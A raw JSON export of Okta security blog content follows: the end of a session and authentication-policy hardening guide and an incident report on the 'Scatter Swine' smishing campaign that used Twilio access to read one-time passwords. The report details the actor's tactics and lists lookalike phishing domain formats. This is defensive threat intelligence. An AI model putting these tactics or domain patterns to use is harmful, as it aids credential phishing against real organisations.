\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Policy settings\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" section to default selections\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Establish the user session with Any factor used\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is set to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"meet the Authentication Policy 
requirements\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Multi Factor Authentication (MFA)\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is set to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"“Not Required”\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (Authentication Policies will define this setting)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Maximum Okta session lifetime\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"12 hours\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (based on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST SP800-63-3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - this minimizes the risk of session cookies misuse or hijacking)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Expire session after user has been idle on Okta for\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"30 
minutes\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (based on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"NIST SP800-63-3\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - this minimizes the risk of session cookies misuse or hijacking)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Set \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Persist session cookies across browser sessions\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Disable\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The re-authentication frequency can also be specified at the Authentication Policy level and should be set in accordance with the sensitivity/impact of the application being accessed. An example could be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"every time\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" for a high impact app and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"never\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" for a low impact app.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below is an example of what an Authentication Policy that satisfies Okta Authenticator Assurance Level 2 (Medium) could look like. In this example multiple factors are required, users need to be on a managed device, EDR signals need to be met, device assurance requirements must be met, and phishing resistance is enforced. 
If all of these requirements are not met, then the user is denied access to the resource.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"1p2sLCb2YpDUZtX2x0upoP\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2D5NEXcleKmY5U3YT0yrXF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3irTPbIkaW8EF0Xtng46uU\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"August 15, 2023: Edited AAL3 requirements to include FastPass with biometrics or PIN.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-08-16T03:06:37.495Z","secAuthor":[{"id":"03d116d2-8ede-584a-94b4-46d34376310d","bio":{"bio":"<p>As a Solutions Engineer at Okta, Josh works closely with customers to identify challenges around identity and then craft solutions catered to the customer's business objectives. Prior to Okta, Josh worked as a Sales Engineer at Citrix where he focused on virtualization and SASE deployments. Josh has a B.S. 
in Chemical and Biochemical Engineering from the Colorado School of Mines and currently resides in Denver, Colorado where he enjoys skiing, climbing, hiking, and playing soccer.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1sb8LvgfuUTcjyGeLDBiSr/919e0a73cff1ba70de2640cf63780d46/josh-clark.png"},"name":"Josh Clark","jobTitle":"Solutions Engineer","slug":"josh-clark","node_locale":"en"},{"id":"b57368d9-674a-5b5a-9d24-f0ec0cca114e","bio":{"bio":"<p>Tin Nguyen manages a team of Solutions Engineers at Okta to help solve the many identity challenges that organizations face today. Before joining Okta, he spent years leading Identity and Security engagements at a consulting firm with an ultimate mission of enabling everyone to safely, seamlessly, and reliably use any technology.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5yGqdlJB5WlusmatIEjk7j/9ead79343e0e49b54215747bcfa0b8ae/tin-nguyen.png"},"name":"Tin Nguyen","jobTitle":"Solutions Engineering Manager","slug":"tin-nguyen","node_locale":"en"}]},{"slug":"/scatterswine","id":"45d94fc0-5af8-563f-98ea-99edadcf307b","title":"Detecting Scatter Swine: Insights into a Relentless Phishing Campaign ","date":"2022-08-25T11:49:59+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Twilio recently identified unauthorized access to information related to 163 Twilio customers, including Okta. 
Access was gained to internal Twilio systems, where data of some Okta customers was accessible to a threat actor (detailed below).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has determined that a small number of 1) Mobile phone numbers and 2) Associated SMS messages containing one-time passwords (“OTPs”) were accessible to the threat actor via the Twilio console.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has notified any customers where a phone number was visible in the console at the time the console was accessed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are no actions necessary for customers at this time. Details regarding this access, our response, and best practices can be found below.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, a number of technology companies were subject to persistent phishing campaigns by a threat actor we refer to as “Scatter Swine”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Defensive Cyber Operations (DCO) has proactively notified these companies when we have observed phishing infrastructure deployed by this threat actor, among others. 
It is commonplace for DCO to detect Scatter Swine repeatedly targeting the same organizations with multiple phishing sites within a matter of hours.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On the evening of Sunday, August 7, 2022, Twilio \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.twilio.com/blog/august-2022-social-engineering-attack\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that a number of Twilio customer accounts and internal applications were accessed in attacks that resulted from one or more of these phishing campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta offers customers a range of authenticators to choose from, including the use of SMS for the delivery of one-time codes. Twilio provides one of two services Okta leverages for customers that choose to use SMS as an authentication factor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On August 8, 2022, Twilio provided an initial notification to Okta, to inform us that unspecified data relevant to Okta was accessed during Twilio’s incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta prioritized routing of SMS-based communications to an alternative provider while we worked with Twilio’s security team to understand the scope and impact of the incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Twilio security team supported our investigation by subsequently providing internal system logs which we were able to use to correlate and identify the extent of the threat actor’s activity as it pertains to 
Okta customer data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using these logs, Okta’s Defensive Cyber Operations’ analysis established that two categories of Okta-relevant mobile phone numbers and one-time passwords were viewable during the time in which the attacker had access to the Twilio console. A one-time passcode is valid for five minutes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"primary\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" category (see “Targeted Activity” below) are those mobile phone numbers the threat actor searched for directly in the Twilio console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"secondary\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" category (see “Incidental Exposure” below) are mobile phone numbers that can be considered ‘incidental’ to the specific actions or objectives of the threat actor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has notified customers with mobile phone numbers in both of the above categories.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Targeted Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor searched for 38 unique phone numbers in the Twilio console, nearly all of which can be linked to a single targeted organization.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A 
review of logs provided to us by Twilio revealed that the threat actor was seeking to expand their access. We assess that the threat actor used credentials (usernames and passwords) previously stolen in phishing campaigns to trigger SMS-based MFA challenges, and used access to Twilio systems to search for One Time Passwords sent in those challenges.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Incidental Exposure\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The second category of exposed mobile phone numbers were incidental to this activity. Incidental, in this case, can be defined as phone numbers that may have been present in the Twilio portal during the threat actor's limited activity window. Okta's analysis reveals no indication that the threat actor targeted or used such mobile phone numbers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor performed their searches using Twilio administrative portals that (by default) list the most recent 50 messages sent using Okta’s Twilio account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta usernames are not visible in Twilio logs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor took no actions that indicated an intent to use access to this information, an observation we have verified via extensive investigation (described below).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Intrusion Analysis\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After analyzing suspicious activity and identifying 
key TTPs used by the threat actor, Okta performed threat hunting across our platform logs during the time period that the threat actor was known to have had access to Twilio’s systems. Some example threat hunting searches are provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This exercise uncovered an event in which the threat actor successfully tested this technique against a single account unrelated to the primary target. The threat actor did not perform any additional actions once they had validated this access, and returned to their prior activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Outside of this isolated event, there is no evidence that the threat actor successfully used this technique to expand the scope of its access outside of their primary target.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tactics, Techniques and Procedures\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scatter Swine has directly targeted Okta via phishing campaigns on several occasions, but was unable to access accounts due to the strong authentication policies that protect access to our applications.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security has observed the following TTPs (tactics, techniques and procedures) employed by Scatter Swine:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor makes use of infrastructure provided by Bitcoin-friendly provider Bitlaunch, providing servers from DigitalOcean, 
Vultr, and Linode.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preferred domain name registrars include Namecheap or Porkbun, both of which accept Bitcoin as payment.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have observed the threat actor delivering phishing lures in bulk to individuals in targeted organizations via text messages. We are aware of multiple instances where hundreds of messages were sent to employees and even to family members of employees.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor likely harvests mobile phone numbers from commercially available data aggregation services that link phone numbers to employees at specific organizations.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor calls targeted individuals and impersonates support trying to understand how authentication works. 
The accent of the threat actor appears to be North American, confident and clearly spoken.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor’s targets have included technology companies, telecommunications providers and organizations and individuals linked to cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor predominantly hosts self-contained, HTTP-based phishing infrastructure. Their sites do not use TLS certificates.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the threat actor successfully harvests user credentials during a SMishing (SMS phishing) campaign, attempts are made to authenticate using anonymizing proxy services. In this particular campaign the threat actor favored Mullvad VPN.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The phishing kit used by the threat actor is designed to capture usernames, passwords and OTP factors. 
We have also observed the threat actor triggering multiple push notifications in an attempt to trick a target into allowing access to the account.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor has been observed connecting to multiple users from the same Windows device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor registers domain names in common formats in order to socially engineer targets into entering their credentials into their phishing sites.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-corp.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-help.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-help.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-helpdesk.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-login.co\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted 
organization}-mfa.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.co\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-okta.us\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-onelogin.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-sso.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-sso.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted 
organization}-vpn.com\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-vpn.net\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"{targeted organization}-vpn.org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta-{targeted organization}.com\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stepping up your defenses\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Based on our analysis of this intrusion, we recommend that customers embrace a “defense in depth” approach to protecting user accounts from phishing attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use strong authenticators with the most phishing-resistant properties, such as FIDO2 WebAuthn platform and roaming authenticators and smart cards. Consider FastPass, Okta’s passwordless solution as a longer-term strategy to minimize exposure to credential-based attacks.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. 
Okta customers can make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication policies can be used to restrict user access to applications based on a range of customer-configurable prerequisites.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/behavior-detection/configure-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to act (via step-up authentication) or alert (via System Log) when a user’s sign in behavior deviates from a previous pattern of activity. 
This threat actor is almost always attempting to authenticate from a new device and new IP that has no previous association with the user.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deny or perform step-up authentication on requests from rarely-used networks and anonymizing proxies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict access to applications to only those \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (with Okta FastPass) or devices \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by endpoint management tools, 
and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict access to the most sensitive applications and data using application-specific authentication policies. Require re-authentication \\\"every time\\\" a user signs into these resources.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access 